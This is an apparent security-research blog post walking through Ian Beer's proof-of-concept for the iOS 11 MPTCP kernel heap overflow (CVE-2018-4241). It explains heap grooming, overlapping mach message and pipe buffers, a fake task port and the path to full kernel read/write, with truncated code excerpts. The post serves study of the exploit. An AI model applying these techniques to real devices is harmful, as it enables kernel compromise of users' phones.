Introduction
The iOS 11 mptcp bug (CVE-2018-4241) discovered by Ian Beer is a serious kernel vulnerability which involves a buffer overflow in mptcp_usr_connectx
that allows attackers to execute arbitrary code in a privileged context.
Ian Beer attached an interesting piece of PoC code which demonstrated a rather elegant technique to obtain the kernel task port with this vulnerability. Extending on his brief writeup that comes with the PoC, this blog post will mainly aim at walking through the PoC in great details as well as covering its background. If you are an iOS security researcher who hasn’t looked into the PoC source code yet, hopefully you will find the materials handy when you decide to do so.
Please have a copy of mptcp PoC code before we dive in! You can download it from here: Download
Note: All credits for exploitation techniques, vulnerability PoC code and original writeup belong to Ian Beer at Google Project Zero.
The Vulnerability
Let’s first take a quick look at the offending code in mptcp_usr_connect()
, which is the handler for the connectx
syscall for the AP_MULTIPATH
socket family:
1 | if (src) { |
The code does not validate the sa_len
field if src→sa_family
is neither AF_INET
nor AF_INET6
so the function directly falls through to memcpy
with a user specified sa_len
value up to 255 bytes.
Background
Kernel zone heap allocator
To oversimplify a bit, kernel heap memory is divided into zones, and within one zone allocations are of the same size. For each zone, kernel keeps four doubly-linked lists to categorize a page’s memory availability, namely:
1 | struct { |
When a memory allocation is requested, intermediate
page list is traversed before all_free
list, and a free memory block will be returned from the first available page.
Preallocated ipc_kmsg buffer
ipc_port
has a struct ipc_kmsg *premsg
member that points to an optional preallocated ipc_kmsg
buffer. The intended use case is to allow user space to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers. In addition, this kernel heap buffer will not be freed after the message gets delivered to user space. Ian Beer uses this fact to increase the stability of the exploit.
Mach exception port
Mach provides an IPC-based exception-handling facility wherein exceptions are converted to messages. A thread or task can register one or multiple mach ports as so-called “exception port” to receive information about an exception. When an exception occurs, a message containing information about the exception is sent to the exception port. In this way, together with a mach port with preallocated ipc_kmsg
buffer, we can force the kernel to send data to a deterministic location in the heap. Furthermore, we can also partially control the content of the message by manipulating the register state at the time of the exception, which will be dutifully carried over in the message by the kernel.
For more information about preallocated message and exception handling mechanism, readers are adviced to check out Ian Beer’s excellent writeup on the iOS 10 extra-recipe bug here, as well as Chapter 9.7 in Amit Singh’s seminal Mac OS X Internals.
Ok, let’s now dig in!
Finding the target
By passing in a src
with an unexpected sa_family
, we are now able to overflow inside mpte
, a mptses
structure, with sa_len
bytes of attacker-controlled data. Here is the struct declaration in /bsd/netinet/mptcp_var.h:
1 | struct mptses { |
Here, the mpte_itfinfo
is particularly interesting because it’s a pointer… keep digging in references to mpte_itfinfo
… oh snap!
1 | if (mpte->mpte_itfinfo_size > MPTE_ITFINFO_SIZE) |
In mptcp_session_destroy
, the address pointed to by mpte_itfinfo
is freed, and mpte_itfinfo_size
is under our complete control too! Moreover, we don’t need to know a priori the size of the object we would like to _FREE
, because kfree_addr()
will look up the size from the memory zone struct in which the object resides. (_FREE
is just a macro around kfree_addr().
)
This is just too good to be true.
Set up the heap
To turn this overflow into something actually useful, it’s time for some heap Feng Shui. The end goal here is to have an ipc_kmsg
and a pipe buffer
overlapping with each other so that we can write to and read from it. In the PoC, Ian Beer chooses to overwrite the lower 3 bytes of mpte_itfinfo
with 0x000000, after which it will point to a 16MB aligned page boundary.
In order to have an ipc_kmsg
sitting right at that 16MB boundary, the code alternatingly allocates 16MB of ipc_kmsg
and a bunch of mptcp sockets in the kernel heap. The former is done by allocating fake mach ports and sending mach messages of calculated size to the port, during which mach_msg(...MACH_SEND_MSG...)
will allocate kernel heap buffer for us and copyin
the message from user space. This technique allows us to effectively do the same thing as kalloc
but from outside the kernel. We are also able to control the memory zone for the ipc_kmsg
, since all it takes is just to work backward, calculate the msgh_size
based on the kalloc size we would like to achieve. In the PoC, Ian Beer chose to place ipc_kmsg
s in kalloc.2048
zone.
1 | // a few times do: |
Trigger the bug
The code in do_partial_kfree_with_socket
triggers the bug, overwriting the lower 3 bytes of *mpte_itfinfo
with NULL bytes and let’s hope now it somewhat looks like the diagram shown below. Fingers crossed! 🤞
1 | void do_partial_kfree_with_socket(int fd, uint64_t kaddr, uint32_t n_bytes) { |
After we point mpte_itfinfo
to the 16MB boundary, we can trigger the _FREE
by just close
the socket.
One caveat is that we need to wait for mptcp_gc
because mpte_itfinfo
is not instantaneously _FREE
‘ed after socket is closed, as evident by the comments of this function in /xnu-4570.41.2/bsd/netinet/mptcp_subr.c
:
1 | /* |
After _FREE
, hopefully now one of the ipc_kmsg
is freed and the page put on the Intermidiate list.
Allocate pipes
Next, we allocate a bunch of pipes and write to its write end
2047 bytes of data. The backing buffers for these pipes will come from kalloc.2048, hopefully including our 16MB-aligned address:
Trigger the bug again
Trigger the bug a second time, _FREE
the underlying pipe buffer and put the page on Intermediate page list again.
After overflow:
After _FREE
:
Allocate more mach ports!
Next, we allocate a bunch of mach ports with preallocated ipc_kmsg
buffers from kalloc.2048
zone using mach_port_allocate_full()
and pass in the size as a member of the mach_port_qos_t
parameter. The desired size for the preallocated buffer is 2048 bytes in order to place it in kalloc.2048
zone, hopefully one of them picks up the space we just _FREE
‘ed.
We then insert a SEND RIGHT
to every mach port we allocated in this step, as each one will be registered as another thread’s exception port later.
Catching the pipe
As shown on the diagram above, ideally now we have an ipc_kmsg
(which we can get messages sent to and then receive) and a pipe buffer (which we can read and write) overlapping each other.
We now need to find out which one of the hundreds of pipes we allocated a while ago is on that spot.
1 | int find_replacer_pipe(void** contents) { |
The technique Ian Beer used here is just to read from each pipe, and compare the content read with the original data we piped into the buffer, BBBBBBBBB
(0x4242424242 in hex). If different, that means the underlying buffer has been overwritten by a newly allocated ipc_kmsg
.
If we can’t find a pipe satisfying this condition it simply means there is no overlapping, and we just have to restart and wish ourselves better luck next time.
Catching the port
Now, we need to figure out which port owns the preallocated ipc_kmsg
buffer. To do that, we need to somehow persuade the kernel into overwriting prealloced kmsg
with something different so that we can compare the content again and spot the difference.
Ian Beer’s technique in the PoC is to register each port as an exception port for a thread and intentionally raise an exception on the thread, causing the kernel to send a kmsg
to the buffer, then immediately compares the content by reading from the pipe. This is ingenious.
for (int i = 0; i < 100; i++) {
send_prealloc_msg(exception_ports[i]);
// read from the pipe and see if the contents changed:
Let’s walk through send_prealloc_msg()
step by step.
1. Start a thread
pthread_create(&t, NULL, do_thread, (void*)port);
2. Register exception port
1 | void* do_thread(void* arg) { |
3. Substitute thread port with a host port
1 | // make the thread port which gets sent in the message actually be the host port |
4. Crash the thread
1 | // cause an exception message to be sent by the kernel |
After the thread crashes, a message containing the exception information is sent to our ipc_kmsg
buffer, waiting to be received and processed by the port. We can now read from the pipe and compare the content.
1 | ssize_t amount = read(replacer_pipe, new_contents, PIPE_SIZE); |
At this point, we have fully discovered the overlapping pipe, port pair.
We also need to save the kernel address for the host port and our task port for later:
1 | // We will get kernel ipc_space address from this later |
Build fake task port
Before we receive the exception message into user space, we want to build a fake task port to allow early kernel arbitray read.
build_fake_task_port(original_contents+fake_port_offset, fake_port_kaddr, early_read_pipe_buffer_kaddr, 0, 0);
We can do this by mimicking the structure of a proper task port:
1 |
|
and shoving it into our ipc_kmsg
buffer with our replacer_pipe
.
1 | // the thread port is at +66ch |
We can read off the kernel address of our buffer from the next
field, which points back to the buffer itself given it is the only ipc_kmsg
in the queue.
1 | uint64_t pipe_buf = *((uint64_t*)(new_contents + 0x8)); |
Let’s zoom into our ipc_kmsg
buffer to observe the change.
Now, the thread_port points to our fake task port! Mission accomplished!
Note: Here, in this particular PoC, *thread_port
actually points to a host port because in Step 3 of the previous section, we substitute the thread port with host port. By doing this, we have a leaked host port kernel address, which can be used to obtain kernel’s ipc_space
later. We will cover this shortly.
Receive the exception message
User space programs can receive the exception message by a callout to system exception server, exc_server
, after which various port rights in the ipc_kmsg
will be inserted into calling task’s ipc_space
, including our fake task port’s send right (which is really supposed to be a thread port).
We can now simply extract the port name to the fake port from the exception handler callback, from the thread
argument:
1 | kern_return_t catch_exception_raise_state_identity |
At this point, we have successfully inserted a fake task port into our task’s ipc_space
. Isn’t this ingenious?
Build early kernel read primitive
With the fake task port we can build an early kernel read primitive by using pid_for_task()
.
Given a valid task port, pid_for_task()
simply get a task
pointer from port’s ip_kobject
, deference and retrieve the proc
pointer from task’s bsd_info
, dereference again the proc
struct and get the pid from it. Since all it does is just some pointer arithmetic and dereferencing, we can just create a fake task struct inside the ipc_kmsg
we control, work backward and place the kernel address we would like to read at the correct offset.
1 | uint8_t* fake_task = fake_port + 0x100; |
With every call to early_rk32
, we just need to rebuild the task port, fixing the bsd_info
pointer address accordingly:
Here, unsurprisingly, 0x10
is just the offset of the p_pid
field inside struct proc
, as evident in proc_internal.h
:
1 | struct proc { |
The drawback of this technique is that the read is limited to 32 bits, which is the size of a pid_t
.
Build full kernel read/write primitive
Notice that the struct ipc_space *receiver
field in our fake port and an address space description, vm_map_t map
, in our fake task is still missing. We can achieve full kernel read/write by filling in the address for ipc_space_kernel
and kernel task’s vm_map
.
We can get the kernel ipc_space
from the host port we obtained a while ago, with a known offset:
1 | // receiver field |
However, kernel’s vm_map
is a bit trickier to get.
Ian Beer’s approach takes the following steps:
- Find the kernel task port on the heap
- Get kernel’s task from task port
- Get the
vm_map
form kernel task
To find the kernel task port on the heap, we search in the vicinity of the host port for anything that looks like a task port and get the kernel task vm_map
from it:
1 | // now look through up to 0x4000 of ports and find one which looks like a task port: |
After insert what we just found into our fake port and fake task, we now finally get a fully functional, but “fake”, tfp0. Hooray!
Have fun now with your freshly baked tfp0!
Reference
- XNU kernel heap overflow due to bad bounds checking in MPTCP, Ian Beer
- Exception-based exploitation on iOS, Ian Beer
- CVE-2018-4241, Common Vulnerabilities and Exposures
- Mac OS X Internals - A System Approach, Amit Singh
- *OS Internals: Volume III security & Insecurity, Jonathan Levin